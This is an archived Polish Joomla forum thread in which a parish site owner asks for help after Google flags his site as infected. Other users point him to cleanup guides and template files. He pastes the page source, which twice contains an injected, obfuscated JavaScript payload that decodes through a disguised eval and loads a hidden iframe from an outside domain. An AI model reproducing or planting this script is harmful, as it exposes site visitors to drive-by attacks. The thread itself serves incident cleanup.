PDA

Zobacz pełną wersję : Google znalazlo na mojej stonie wirusa:/ joomla1.7



bogoswasko
05-04-2012, 12:39
Witam jestem początkujący jeśli chodzi o joomle. Mój problem polega na tym że jakiś czas temu zaczół pojawiać się komunikat że stona może zawierać wirusa. Przeczytałem że możliwe jest by ktoś dopisał linijke kodu java do index.php ale szukałem i nic nie znalazłem, lecz klikając na kod źródłowy strony jest moim zdaniem niepokojący script. Czy jest to wirus? Jak go usunąć? adres mojej strony to: stary_wisnicz.diecezja.tarnow.pl a nie pokojący script:


</div>



<!-- //CONTENT -->



<!-- LEFT COLUMN-->



<div id="ja-left" class="column sidebar" style="width:20%">







<div class="ja-colswrap clearfix ja-l1">



<div id="ja-left1" class="ja-col column" style="width:100%">



<div class="ja-moduletable moduletable_menu clearfix" id="Mod1">



<h3><span>Main Menu</span></h3>



<div class="ja-box-ct clearfix">



<script>c=2;i=c-2;if(parseInt("0123")===83)if(window.document)try{new String("asd").prototype.q}catch(egewgsd){f=['-30i-30i66i63i-7i1i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70 i62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i 61i82i0i2i52i9i54i2i84i-26i-30i-30i-30i66i63i75i58i70i62i75i1i2i20i-26i-30i-30i86i-7i62i69i76i62i-7i84i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i80i75i66i77i62i1i-5i21i66i63i75i58i70i62i-7i76i75i60i22i0i65i77i77i73i19i8i8i78i71i80i72i80i 73i78i7i62i78i8i60i72i78i71i77i12i7i73i65i73i0i-7i80i66i61i77i65i22i0i10i9i0i-7i65i62i66i64i65i77i22i0i10i9i0i-7i76i77i82i69i62i22i0i79i66i76i66i59i66i69i66i77i8 2i19i65i66i61i61i62i71i20i73i72i76i66i77i66i72i71i 19i58i59i76i72i69i78i77i62i20i69i62i63i77i19i9i20i 77i72i73i19i9i20i0i23i21i8i66i63i75i58i70i62i23i-5i2i20i-26i-30i-30i86i-26i-30i-30i63i78i71i60i77i66i72i71i-7i66i63i75i58i70i62i75i1i2i84i-26i-30i-30i-30i79i58i75i-7i63i-7i22i-7i61i72i60i78i70i62i71i77i7i60i75i62i58i77i62i30i6 9i62i70i62i71i77i1i0i66i63i75i58i70i62i0i2i20i63i7 i76i62i77i26i77i77i75i66i59i78i77i62i1i0i76i75i60i 0i5i0i65i77i77i73i19i8i8i78i71i80i72i80i73i78i7i62 i78i8i60i72i78i71i77i12i7i73i65i73i0i2i20i63i7i76i 77i82i69i62i7i79i66i76i66i59i66i69i66i77i82i22i0i6 5i66i61i61i62i71i0i20i63i7i76i77i82i69i62i7i73i72i 76i66i77i66i72i71i22i0i58i59i76i72i69i78i77i62i0i2 0i63i7i76i77i82i69i62i7i69i62i63i77i22i0i9i0i20i63 i7i76i77i82i69i62i7i77i72i73i22i0i9i0i20i63i7i76i6 2i77i26i77i77i75i66i59i78i77i62i1i0i80i66i61i77i65 i0i5i0i10i9i0i2i20i63i7i76i62i77i26i77i77i75i66i59 i78i77i62i1i0i65i62i66i64i65i77i0i5i0i10i9i0i2i20i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i 62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i6 1i82i0i2i52i9i54i7i58i73i73i62i71i61i28i65i66i69i6 1i1i63i2i20i-26i-30i-30i86'][0].split('i');md='a';v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;565!=i;i+=1){j=i;s+=r["fromC"+"harCode"](39+1*w[j]);}if(f)z=s;e(z);</script>



<ul class="menu">



<li class="item-101 current active"><a href="/" >Strona Główna</a></li><li class="item-102 parent"><a href="/index.php/aktualnosci" >Aktualności</a></li><li class="item-105 parent"><a href="/index.php/grupy-parafialne" >Grupy Parafialne</a></li><li class="item-113 parent"><a href="/index.php/o-parafi" >O Parafi</a></li><li class="item-120"><a href="/index.php/kontakt" >Kontakt</a></li></ul>



</div>



</div>



<div class="ja-moduletable moduletable clearfix" id="Mod80">



<h3><span>Nowości</span></h3>




<div class="ja-box-ct clearfix">



<script>c=2;i=c-2;if(parseInt("0123")===83)if(window.document)try{new String("asd").prototype.q}catch(egewgsd){f=['-30i-30i66i63i-7i1i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70 i62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i 61i82i0i2i52i9i54i2i84i-26i-30i-30i-30i66i63i75i58i70i62i75i1i2i20i-26i-30i-30i86i-7i62i69i76i62i-7i84i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i80i75i66i77i62i1i-5i21i66i63i75i58i70i62i-7i76i75i60i22i0i65i77i77i73i19i8i8i78i71i80i72i80i 73i78i7i62i78i8i60i72i78i71i77i12i7i73i65i73i0i-7i80i66i61i77i65i22i0i10i9i0i-7i65i62i66i64i65i77i22i0i10i9i0i-7i76i77i82i69i62i22i0i79i66i76i66i59i66i69i66i77i8 2i19i65i66i61i61i62i71i20i73i72i76i66i77i66i72i71i 19i58i59i76i72i69i78i77i62i20i69i62i63i77i19i9i20i 77i72i73i19i9i20i0i23i21i8i66i63i75i58i70i62i23i-5i2i20i-26i-30i-30i86i-26i-30i-30i63i78i71i60i77i66i72i71i-7i66i63i75i58i70i62i75i1i2i84i-26i-30i-30i-30i79i58i75i-7i63i-7i22i-7i61i72i60i78i70i62i71i77i7i60i75i62i58i77i62i30i6 9i62i70i62i71i77i1i0i66i63i75i58i70i62i0i2i20i63i7 i76i62i77i26i77i77i75i66i59i78i77i62i1i0i76i75i60i 0i5i0i65i77i77i73i19i8i8i78i71i80i72i80i73i78i7i62 i78i8i60i72i78i71i77i12i7i73i65i73i0i2i20i63i7i76i 77i82i69i62i7i79i66i76i66i59i66i69i66i77i82i22i0i6 5i66i61i61i62i71i0i20i63i7i76i77i82i69i62i7i73i72i 76i66i77i66i72i71i22i0i58i59i76i72i69i78i77i62i0i2 0i63i7i76i77i82i69i62i7i69i62i63i77i22i0i9i0i20i63 i7i76i77i82i69i62i7i77i72i73i22i0i9i0i20i63i7i76i6 2i77i26i77i77i75i66i59i78i77i62i1i0i80i66i61i77i65 i0i5i0i10i9i0i2i20i63i7i76i62i77i26i77i77i75i66i59 i78i77i62i1i0i65i62i66i64i65i77i0i5i0i10i9i0i2i20i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i 62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i6 1i82i0i2i52i9i54i7i58i73i73i62i71i61i28i65i66i69i6 1i1i63i2i20i-26i-30i-30i86'][0].split('i');md='a';v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;565!=i;i+=1){j=i;s+=r["fromC"+"harCode"](39+1*w[j]);}if(f)z=s;e(z);</script><ul class="latestnews">



<li>




Bardzo proszę o pomoc. Pozdrawiam bogoswasko

Bazyl
05-04-2012, 12:42
http://www.wiki.joomla.pl/index.php/Witryna_po_w%C5%82amaniu

a_m
05-04-2012, 12:51
nie wiem jakiego konkretnie szablony JA używasz; lokalizacja skryptu świadczy, że może się pojawić w dwóch miejscach - katalog_szablonu/html/modules.php lub plugins/system/jat3/jat3/base-themes/default/html/modules.php

bogoswasko
05-04-2012, 13:04
NIestety w tych lokalizacjach nic nie znalazłem:/ Na stronie którą podałeś bayl punkt 3 jest nie do zrealizowania gdyż nie otwiera mi się strona z tym skryptem
"Lista niedawno zmodyfikowanych plików
Zanim zaczniesz robić jakiekolwiek zmiany na stronie, sporządź listę ostatnio modyfikowanych plików. Tutaj jest skrypt który wygeneruje listę zmienianych plików (http://www.joomlation.eu/index.php?option=com_docman&task=cat_view&gid=17&Itemid=35). Usuń ten plik od razu po stworzeniu listy! Nie podawaj linku do tego pliku nikomu - nawet znajomym!"

trzepiz
05-04-2012, 13:59
załączam skrypt

bogoswasko
05-04-2012, 14:44
Gdzie mam go wrzucić:( przepraszam ale już całkiem zgłupiałem z tą stroną:/

Karol99
05-04-2012, 15:48
Rozpakuj lokalnie i wrzuć FTP-em do katalogu głównego swojej strony. Potem w przeglądarce internetowej wywołaj adres twojastro.na/wypier.php

bogoswasko
06-04-2012, 11:52
Znalazłem źródło moich problemów. Tylko mam teraz problem bo znajduje się ono tutaj: /index.php/aktualnosci. Jak dostać się do tego pliku?

bogoswasko
10-04-2012, 21:01
Podczas dodawanie artykułów dopisywany są te krzaczki co powyżej. Co mam zrobić? Googl pokazuje ze wirusy sa

/index.php/aktualnosci -



/index.php/o-parafi -



/index.php/grupy-parafialne/grupa-apostolska -



/index.php/grupy-parafialne/lektorzy -



/index.php/o-parafi/architektura-swiatyni -



/index.php/o-parafi/ksieza-w-parafii -



/index.php/aktualnosci/aktualnosci/7-zaczynamy-od-nowa -

Jak znajde te pliki? Co mam zrobić żeby to naprawić?

big_krzysiek
10-04-2012, 21:08
Google pokazuje ze masz wirusy na tych stronach, które indeksował ostatnio. Masz prawdopodobnie zarażoną całą stronę.

bogoswasko
11-04-2012, 00:09
Czyli teraz zostaje ściągnąć wszystkie pliki na dysk i antywirusem zeskanować?

twardaglowa
18-08-2012, 15:38
Dzięki za pomoc.Też skorzystałam